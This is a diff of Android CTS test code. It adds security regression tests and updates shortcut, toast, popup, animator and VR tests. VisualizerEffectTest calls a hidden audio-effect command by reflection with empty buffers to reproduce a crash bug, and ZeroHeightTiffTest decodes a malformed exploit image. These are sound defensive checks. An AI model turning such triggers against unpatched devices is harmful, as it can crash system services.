+++ b/tests/tests/security/src/android/security/cts/VisualizerEffectTest.java
@@ -0,0 +1,84 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import junit.framework.TestCase;
+
+import android.content.Context;
+import android.platform.test.annotations.SecurityTest;
+import android.media.audiofx.AudioEffect;
+import android.media.MediaPlayer;
+import android.media.audiofx.Visualizer;
+import android.test.AndroidTestCase;
+import android.test.InstrumentationTestCase;
+import android.util.Log;
+
+import java.lang.reflect.Constructor;
+import java.lang.reflect.Method;
+import java.util.UUID;
+
+public class VisualizerEffectTest extends InstrumentationTestCase {
+ private String TAG = "VisualizerEffectTest";
+ @Override
+ protected void setUp() throws Exception {
+ super.setUp();
+ }
+
+ //Testing security bug: 30229821
+ @SecurityTest
+ public void testVisualizer_MalformedConstructor() throws Exception {
+ final String VISUALIZER_TYPE = "e46b26a0-dddd-11db-8afd-0002a5d5c51b";
+ final int VISUALIZER_CMD_MEASURE = 0x10001;
+
+ AudioEffect.Descriptor[] descriptors = AudioEffect.queryEffects();
+ int i, visualizerIndex = -1;
+ for (i = 0; i < descriptors.length; ++i) {
+ AudioEffect.Descriptor descriptor = descriptors[i];
+ if (descriptor.type.compareTo(UUID.fromString(VISUALIZER_TYPE)) == 0) {
+ visualizerIndex = i;
+
+ AudioEffect ae = null;
+ MediaPlayer mp = null;
+ try {
+ mp = MediaPlayer.create(getInstrumentation().getContext(), R.raw.good);
+ Constructor ct = AudioEffect.class.getConstructor(UUID.class, UUID.class,
+ int.class, int.class);
+ ae = (AudioEffect) ct.newInstance(descriptors[visualizerIndex].type,
+ descriptors[visualizerIndex].uuid, 0, mp.getAudioSessionId());
+ Method command = AudioEffect.class.getDeclaredMethod("command", int.class,
+ byte[].class, byte[].class);
+ Integer ret = (Integer) command.invoke(ae, new Object[]{VISUALIZER_CMD_MEASURE,
+ new byte[0], new byte[0]});
+ assertTrue("Audio server might have crashed", ret != -7);
+ } catch (Exception e) {
+ Log.w(TAG,"Problem testing visualizer");
+ } finally {
+ if (ae != null) {
+ ae.release();
+ }
+ if (mp != null) {
+ mp.release();
+ }
+ }
+ }
+ }
+
+ if (visualizerIndex == -1) {
+ Log.w(TAG,"No visualizer found to test");
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/ZeroHeightTiffTest.java b/tests/tests/security/src/android/security/cts/ZeroHeightTiffTest.java
new file mode 100644
index 0000000..bbc70a9
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/ZeroHeightTiffTest.java
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.graphics.Bitmap;
+import android.graphics.BitmapFactory;
+import android.platform.test.annotations.SecurityTest;
+import android.test.AndroidTestCase;
+
+import java.io.InputStream;
+
+import android.security.cts.R;
+
+public class ZeroHeightTiffTest extends AndroidTestCase {
+ /**
+ * Verifies that the device fails to decode a zero height tiff file.
+ *
+ * Prior to fixing bug 33300701, decoding resulted in undefined behavior (divide by zero).
+ * With the fix, decoding will fail, without dividing by zero.
+ */
+ @SecurityTest
+ public void test_android_bug_33300701() {
+ InputStream exploitImage = mContext.getResources().openRawResource(R.raw.bug_33300701);
+ Bitmap bitmap = BitmapFactory.decodeStream(exploitImage);
+ assertNull(bitmap);
+ }
+}
diff --git a/tests/tests/shortcutmanager/src/android/content/pm/cts/shortcutmanager/ShortcutLaunchedActivity.java b/tests/tests/shortcutmanager/src/android/content/pm/cts/shortcutmanager/ShortcutLaunchedActivity.java
index 61f94d4..fdedc45 100644
--- a/tests/tests/shortcutmanager/src/android/content/pm/cts/shortcutmanager/ShortcutLaunchedActivity.java
+++ b/tests/tests/shortcutmanager/src/android/content/pm/cts/shortcutmanager/ShortcutLaunchedActivity.java
@@ -22,7 +22,9 @@
import android.util.Log;
import java.util.ArrayList;
+import java.util.Arrays;
import java.util.List;
+import java.util.Objects;
import java.util.concurrent.atomic.AtomicInteger;
/**
@@ -36,9 +38,14 @@
private final int mInstanceId = sNextInstanceId.getAndIncrement();
- // @GuardedBy("sReceivedIntents")
+ private static final Object sLock = new Object();
+
+ // @GuardedBy("sLock")
private static final ArrayList<Intent> sReceivedIntents = new ArrayList<>();
+ // @GuardedBy("sLock")
+ private static final ArrayList<String> sExpectedVisibleOrder = new ArrayList<>();
+
private Handler mHandler = new Handler();
private Intent mIntentToAdd;
@@ -48,6 +55,10 @@
mInstanceId, action, getIntent()));
}
+ public ShortcutLaunchedActivity() {
+ log("ctor");
+ }
+
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
@@ -63,22 +74,27 @@
log("onResume");
- synchronized (sReceivedIntents) {
+ synchronized (sLock) {
+ if (!Objects.equals(getIntent().getAction(), sExpectedVisibleOrder.get(0))) {
+ log("Not my turn yet.");
+ return;
+ }
+ sExpectedVisibleOrder.remove(0);
+
// Make sure we only add it once, ever.
if (mIntentToAdd != null) {
sReceivedIntents.add(new Intent(getIntent()));
mIntentToAdd = null;
}
}
- mHandler.post(() -> {
- onBackPressed();
- });
+ finish();
}
@Override
- public void onBackPressed() {
- log("onBackPressed");
- super.onBackPressed();
+ protected void onPause() {
+ log("onPause");
+
+ super.onPause();
}
@Override
@@ -88,14 +104,17 @@
super.onDestroy();
}
- public static void clearIntents() {
- synchronized (sReceivedIntents) {
+ public static void setExpectedOrder(String[] actions) {
+ synchronized (sLock) {
sReceivedIntents.clear();
+
+ sExpectedVisibleOrder.clear();
+ sExpectedVisibleOrder.addAll(Arrays.asList(actions));
}
}
public static List<Intent> getIntents() {
- synchronized (sReceivedIntents) {
+ synchronized (sLock) {
return new ArrayList(sReceivedIntents);
}
}
diff --git a/tests/tests/shortcutmanager/src/android/content/pm/cts/shortcutmanager/ShortcutManagerStartShortcutTest.java b/tests/tests/shortcutmanager/src/android/content/pm/cts/shortcutmanager/ShortcutManagerStartShortcutTest.java
index e80b66e..9cf1f89 100644
--- a/tests/tests/shortcutmanager/src/android/content/pm/cts/shortcutmanager/ShortcutManagerStartShortcutTest.java
+++ b/tests/tests/shortcutmanager/src/android/content/pm/cts/shortcutmanager/ShortcutManagerStartShortcutTest.java
@@ -20,7 +20,6 @@
import static com.android.server.pm.shortcutmanagertest.ShortcutManagerTestUtils.retryUntil;
import static com.android.server.pm.shortcutmanagertest.ShortcutManagerTestUtils.setDefaultLauncher;
-import android.app.ActivityOptions;
import android.content.ActivityNotFoundException;
import android.content.ComponentName;
import android.content.Context;
@@ -29,8 +28,6 @@
import android.os.Bundle;
import android.test.suitebuilder.annotation.SmallTest;
-import org.junit.internal.runners.statements.ExpectException;
-
import java.util.List;
@SmallTest
@@ -45,14 +42,16 @@
}
private List<Intent> launchShortcutAndGetIntents(Context launcher, Context client,
- String id, int expectedNumIntents) {
- return launchShortcutAndGetIntents(launcher, client, id, expectedNumIntents, null, null);
+ String id, int expectedNumIntents, String[] expectedActions) {
+ return launchShortcutAndGetIntents(launcher, client, id, expectedNumIntents, null, null,
+ expectedActions);
}
private List<Intent> launchShortcutAndGetIntents(Context launcher, Context client,
- String id, int expectedNumIntents, Rect rect, Bundle options) {
+ String id, int expectedNumIntents, Rect rect, Bundle options,
+ String[] expectedActions) {
- ShortcutLaunchedActivity.clearIntents();
+ ShortcutLaunchedActivity.setExpectedOrder(expectedActions);
runWithCaller(launcher, () -> {
getLauncherApps().startShortcut(client.getPackageName(), id, rect, options,
@@ -65,8 +64,10 @@
return ShortcutLaunchedActivity.getIntents();
}
- private void assertShortcutStarts(Context launcher, Context client, String id) {
- final List<Intent> launched = launchShortcutAndGetIntents(launcher, client, id, 1);
+ private void assertShortcutStarts(Context launcher, Context client, String id,
+ String[] expectedActions) {
+ final List<Intent> launched = launchShortcutAndGetIntents(launcher, client, id, 1,
+ expectedActions);
assertTrue(launched.size() > 0);
}
@@ -81,6 +82,9 @@
});
}
+ private static final String[] EXPECTED_ACTIONS_SINGLE = new String[]{Intent.ACTION_MAIN};
+ private static final String[] EXPECTED_ACTIONS_MULTI = new String[]{"a3", "a2", "a1"};
+
/**
* Start a single activity.
*/
@@ -100,7 +104,7 @@
});
List<Intent> launched = launchShortcutAndGetIntents(mLauncherContext1, mPackageContext1,
- "s1", 1);
+ "s1", 1, EXPECTED_ACTIONS_SINGLE);
assertEquals(1, launched.size());
assertEquals(Intent.ACTION_MAIN, launched.get(0).getAction());
assertTrue((launched.get(0).getFlags() & Intent.FLAG_ACTIVITY_NO_ANIMATION) != 0);
@@ -132,7 +136,7 @@
});
List<Intent> launched = launchShortcutAndGetIntents(mLauncherContext1, mPackageContext1,
- "s1", 3);
+ "s1", 3, EXPECTED_ACTIONS_MULTI);
assertEquals(3, launched.size());
Intent i = launched.get(2);
@@ -164,7 +168,8 @@
setDefaultLauncher(getInstrumentation(), mLauncherContext2);
// L2 can start it.
- assertShortcutStarts(mLauncherContext2, mPackageContext1, "s1");
+ assertShortcutStarts(mLauncherContext2, mPackageContext1, "s1",
+ EXPECTED_ACTIONS_SINGLE);
// L1 no longer can start it.
assertShortcutCantStart(mLauncherContext1, mPackageContext1, "s1",
@@ -225,7 +230,7 @@
});
// Should still be launchable.
- assertShortcutStarts(mLauncherContext1, mPackageContext1, "s1");
+ assertShortcutStarts(mLauncherContext1, mPackageContext1, "s1", EXPECTED_ACTIONS_SINGLE);
}
public void testPinnedShortcut_differentLauncher() {
@@ -249,7 +254,7 @@
setDefaultLauncher(getInstrumentation(), mLauncherContext2);
// L2 can now launch it.
- assertShortcutStarts(mLauncherContext2, mPackageContext1, "s1");
+ assertShortcutStarts(mLauncherContext2, mPackageContext1, "s1", EXPECTED_ACTIONS_SINGLE);
// Then remove it.
runWithCaller(mPackageContext1, () -> {
@@ -261,14 +266,14 @@
ActivityNotFoundException.class);
// But launcher 1 can still launch it too, because it's pinned by this launcher.
- assertShortcutStarts(mLauncherContext1, mPackageContext1, "s1");
+ assertShortcutStarts(mLauncherContext1, mPackageContext1, "s1", EXPECTED_ACTIONS_SINGLE);
}
public void testStartSingleWithOptions() {
testStartSingle();
List<Intent> launched = launchShortcutAndGetIntents(mLauncherContext1, mPackageContext1,
- "s1", 1, new Rect(1, 1, 2, 2), new Bundle());
+ "s1", 1, new Rect(1, 1, 2, 2), new Bundle(), EXPECTED_ACTIONS_SINGLE);
Intent i = launched.get(0);
assertEquals(1, i.getSourceBounds().left);
@@ -280,7 +285,7 @@
testStartMultiple();
List<Intent> launched = launchShortcutAndGetIntents(mLauncherContext1, mPackageContext1,
- "s1", 3, new Rect(1, 1, 2, 2), new Bundle());
+ "s1", 3, new Rect(1, 1, 2, 2), new Bundle(), EXPECTED_ACTIONS_MULTI);
Intent i = launched.get(2);
assertEquals(1, i.getSourceBounds().left);
@@ -309,7 +314,7 @@
assertExpectException(
ActivityNotFoundException.class, "Shortcut could not be started", () -> {
launchShortcutAndGetIntents(mLauncherContext1, mPackageContext1,
- "s1", 1);
+ "s1", 1, new String[0]);
});
}
@@ -334,7 +339,7 @@
assertExpectException(
ActivityNotFoundException.class, "Shortcut could not be started", () -> {
launchShortcutAndGetIntents(mLauncherContext1, mPackageContext1,
- "s1", 1);
+ "s1", 1, new String[0]);
});
}
}
diff --git a/tests/tests/toastlegacy/src/android/widget/toast/cts/legacy/ToastTest.java b/tests/tests/toastlegacy/src/android/widget/toast/cts/legacy/ToastTest.java
index 207e6ea..c2ecb3a 100644
--- a/tests/tests/toastlegacy/src/android/widget/toast/cts/legacy/ToastTest.java
+++ b/tests/tests/toastlegacy/src/android/widget/toast/cts/legacy/ToastTest.java
@@ -108,7 +108,10 @@
}
@Test
- public void testAddTwoToastsViaAddingWindowApisWhenUidFocusedQuickly() throws Exception {
+ public void testAddTwoToastsViaAddingWindowApisWhenUidNotFocusedQuickly() throws Exception {
+ // Finish the activity so the UID loses focus
+ finishActivity(false);
+
try {
showToastsViaAddingWindow(2, false);
Assert.fail("Only one custom toast window at a time should be allowed");
@@ -120,6 +123,14 @@
}
@Test
+ public void testAddTwoToastsViaAddingWindowApisWhenUidFocusedQuickly() throws Exception {
+ showToastsViaAddingWindow(2, false);
+
+ // Wait for the toast to timeout
+ waitForToastTimeout();
+ }
+
+ @Test
public void testAddTwoToastsViaAddingWindowApisWhenUidFocusedSlowly() throws Exception {
// Add one window
showToastsViaAddingWindow(1, true);
diff --git a/tests/tests/view/src/android/view/animation/cts/AnimatorInflaterTest.java b/tests/tests/view/src/android/view/animation/cts/AnimatorInflaterTest.java
index 3851e94..e8cd62c 100644
--- a/tests/tests/view/src/android/view/animation/cts/AnimatorInflaterTest.java
+++ b/tests/tests/view/src/android/view/animation/cts/AnimatorInflaterTest.java
@@ -128,6 +128,7 @@
WindowManager mWindowManager = (WindowManager) getActivity()
.getSystemService(Context.WINDOW_SERVICE);
Display display = mWindowManager.getDefaultDisplay();
+ int orientation = getActivity().getResources().getConfiguration().orientation;
Instrumentation.ActivityMonitor monitor = new Instrumentation.ActivityMonitor(
getActivity().getClass().getName(), null, false);
@@ -160,6 +161,10 @@
Log.e(TAG, "New activity orientation does not match. Canceling test");
return false;
}
+ if (getActivity().getResources().getConfiguration().orientation == orientation) {
+ Log.e(TAG, "Screen orientation didn't change, test is canceled");
+ return false;
+ }
return true;
}
diff --git a/tests/tests/widget/res/layout/popup_window_scrollable.xml b/tests/tests/widget/res/layout/popup_window_scrollable.xml
new file mode 100644
index 0000000..aa1edd6
--- /dev/null
+++ b/tests/tests/widget/res/layout/popup_window_scrollable.xml
@@ -0,0 +1,101 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!-- Copyright (C) 2016 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+
+<ScrollView
+ xmlns:android="http://schemas.android.com/apk/res/android"
+ android:layout_width="match_parent"
+ android:layout_height="match_parent">
+
+ <RelativeLayout
+ android:id="@+id/main_container"
+ android:layout_width="10000dp"
+ android:layout_height="10000dp">
+
+ <View
+ android:id="@+id/anchor_upper_left"
+ android:layout_width="10dp"
+ android:layout_height="10dp"
+ android:layout_alignParentLeft="true"
+ android:layout_alignParentTop="true"
+ android:background="#f00" />
+
+ <View
+ android:id="@+id/anchor_upper"
+ android:layout_width="10dp"
+ android:layout_height="10dp"
+ android:layout_centerHorizontal="true"
+ android:layout_alignParentTop="true"
+ android:background="#f00" />
+
+ <View
+ android:id="@+id/anchor_upper_right"
+ android:layout_width="10dp"
+ android:layout_height="10dp"
+ android:layout_alignParentRight="true"
+ android:layout_alignParentTop="true"
+ android:background="#f00" />
+
+ <View
+ android:id="@+id/anchor_middle_left"
+ android:layout_width="10dp"
+ android:layout_height="10dp"
+ android:layout_alignParentLeft="true"
+ android:layout_centerVertical="true"
+ android:background="#0f0" />
+
+ <View
+ android:id="@+id/anchor_middle"
+ android:layout_width="10dp"
+ android:layout_height="10dp"
+ android:layout_centerHorizontal="true"
+ android:layout_centerVertical="true"
+ android:background="#0f0" />
+
+ <View
+ android:id="@+id/anchor_middle_right"
+ android:layout_width="10dp"
+ android:layout_height="10dp"
+ android:layout_alignParentRight="true"
+ android:layout_centerVertical="true"
+ android:background="#0f0" />
+
+ <View
+ android:id="@+id/anchor_lower_left"
+ android:layout_width="10dp"
+ android:layout_height="10dp"
+ android:layout_alignParentLeft="true"
+ android:layout_alignParentBottom="true"
+ android:background="#00f" />
+
+ <View
+ android:id="@+id/anchor_lower"
+ android:layout_width="10dp"
+ android:layout_height="10dp"
+ android:layout_centerHorizontal="true"
+ android:layout_alignParentBottom="true"
+ android:background="#00f" />
+
+ <View
+ android:id="@+id/anchor_lower_right"
+ android:layout_width="10dp"
+ android:layout_height="10dp"
+ android:layout_alignParentRight="true"
+ android:layout_alignParentBottom="true"
+ android:background="#00f" />
+
+ </RelativeLayout>
+
+</ScrollView>
\ No newline at end of file
diff --git a/tests/tests/widget/src/android/widget/cts/PopupWindowTest.java b/tests/tests/widget/src/android/widget/cts/PopupWindowTest.java
index 47efffc..918a161 100644
--- a/tests/tests/widget/src/android/widget/cts/PopupWindowTest.java
+++ b/tests/tests/widget/src/android/widget/cts/PopupWindowTest.java
@@ -16,6 +16,14 @@
package android.widget.cts;
+import static org.mockito.Matchers.anyInt;
+import static org.mockito.Mockito.any;
+import static org.mockito.Mockito.mock;
+import static org.mockito.Mockito.never;
+import static org.mockito.Mockito.times;
+import static org.mockito.Mockito.verify;
+import static org.mockito.Mockito.when;
+
import android.app.Activity;
import android.app.Instrumentation;
import android.content.Context;
@@ -44,13 +52,6 @@
import android.widget.TextView;
import android.widget.cts.R;
-import static org.mockito.Mockito.any;
-import static org.mockito.Mockito.mock;
-import static org.mockito.Mockito.never;
-import static org.mockito.Mockito.times;
-import static org.mockito.Mockito.verify;
-import static org.mockito.Mockito.when;
-
public class PopupWindowTest extends
ActivityInstrumentationTestCase2<PopupWindowCtsActivity> {
private Instrumentation mInstrumentation;
@@ -772,7 +773,19 @@
WindowManager.LayoutParams.FLAG_ALT_FOCUSABLE_IM & p.flags);
}
- public void testEnterExitTransition() {
+ public void testEnterExitTransitionAsDropDown() throws Throwable {
+ final View anchorView = mActivity.findViewById(R.id.anchor_upper);
+ verifyEnterExitTransition(
+ () -> mPopupWindow.showAsDropDown(anchorView, 0, 0));
+ }
+
+ public void testEnterExitTransitionAtLocation() throws Throwable {
+ final View anchorView = mActivity.findViewById(R.id.anchor_upper);
+ verifyEnterExitTransition(
+ () -> mPopupWindow.showAtLocation(anchorView, Gravity.BOTTOM, 0, 0));
+ }
+
+ private void verifyEnterExitTransition(Runnable showRunnable) throws Throwable {
TransitionListener enterListener = mock(TransitionListener.class);
Transition enterTransition = new BaseTransition();
enterTransition.addListener(enterListener);
@@ -791,8 +804,7 @@
verify(exitListener, never()).onTransitionStart(any(Transition.class));
verify(dismissListener, never()).onDismiss();
- final View anchorView = mActivity.findViewById(R.id.anchor_upper);
- mInstrumentation.runOnMainSync(() -> mPopupWindow.showAsDropDown(anchorView, 0, 0));
+ mInstrumentation.runOnMainSync(showRunnable);
mInstrumentation.waitForIdleSync();
verify(enterListener, times(1)).onTransitionStart(any(Transition.class));
verify(exitListener, never()).onTransitionStart(any(Transition.class));
@@ -1069,6 +1081,30 @@
assertEquals(LayoutParams.MATCH_PARENT, p.height);
}
+ public void testPositionAfterParentScroll() {
+ View.OnScrollChangeListener scrollChangeListener = mock(
+ View.OnScrollChangeListener.class);
+
+ getInstrumentation().runOnMainSync(() -> {
+ mActivity.setContentView(R.layout.popup_window_scrollable);
+
+ View anchor = mActivity.findViewById(R.id.anchor_upper);
+ PopupWindow window = createPopupWindow();
+ window.showAsDropDown(anchor);
+ });
+
+ getInstrumentation().runOnMainSync(() -> {
+ View parent = mActivity.findViewById(R.id.main_container);
+ parent.scrollBy(0, 500);
+ parent.setOnScrollChangeListener(scrollChangeListener);
+ });
+
+ getInstrumentation().waitForIdleSync();
+
+ verify(scrollChangeListener, never()).onScrollChange(
+ any(View.class), anyInt(), anyInt(), anyInt(), anyInt());
+ }
+
private static class BaseTransition extends Transition {
@Override
public void captureStartValues(TransitionValues transitionValues) {}
diff --git a/tests/vr/src/android/vr/cts/VrDisplayTest.java b/tests/vr/src/android/vr/cts/VrDisplayTest.java
index 9dfdf96..b26f4ed 100644
--- a/tests/vr/src/android/vr/cts/VrDisplayTest.java
+++ b/tests/vr/src/android/vr/cts/VrDisplayTest.java
@@ -52,18 +52,20 @@
*/
public void testRefreshRateIsAtLeast60Hz() throws Throwable {
final int NUM_FRAMES = 200;
- mActivity = getGlEsActivity(NUM_FRAMES, 3);
+ // Add an extra frame to allow the activity to start up.
+ mActivity = getGlEsActivity(NUM_FRAMES + 1, 3);
if (!mActivity.supportsVrHighPerformance())
return;
- long startNanos = System.nanoTime();
+ // Skip the first frame to allow for startup time.
+ mActivity.waitForFrameDrawn();
// Render a few hundred frames.
- int error;
+ long startNanos = System.nanoTime();
while (!mActivity.waitForFrameDrawn());
- error = mActivity.glGetError();
- assertEquals(GLES32.GL_NO_ERROR, error);
long endNanos = System.nanoTime();
+ int error = mActivity.glGetError();
+ assertEquals(GLES32.GL_NO_ERROR, error);
double fps = NUM_FRAMES / (double)(endNanos - startNanos) * 1e9;
assertTrue(fps >= 59.);
diff --git a/tools/cts-tradefed/res/config/cts-sts.xml b/tools/cts-tradefed/res/config/cts-sts.xml
new file mode 100644
index 0000000..8e4c030
--- /dev/null
+++ b/tools/cts-tradefed/res/config/cts-sts.xml
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!-- Copyright (C) 2016 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+<configuration description="Runs Security Patch test cases">
+
+ <option name="plan" value="cts-sts" />
+
+ <include name="cts"/>
+
+ <option name="compatibility:include-filter" value="CtsSecurityTestCases" />
+
+ <option name="compatibility:include-filter" value="CtsSecurityHostTestCases" />
+
+ <!-- Only run tests with @SecurityTest annotation. -->
+ <option name="compatibility:module-arg" value="CtsSecurityHostTestCases:include-annotation:android.platform.test.annotations.SecurityTest"/>
+
+ <option name="compatibility:test-arg" value="com.android.tradefed.testtype.AndroidJUnitTest:include-annotation:android.platform.test.annotations.SecurityTest" />
+
+</configuration>
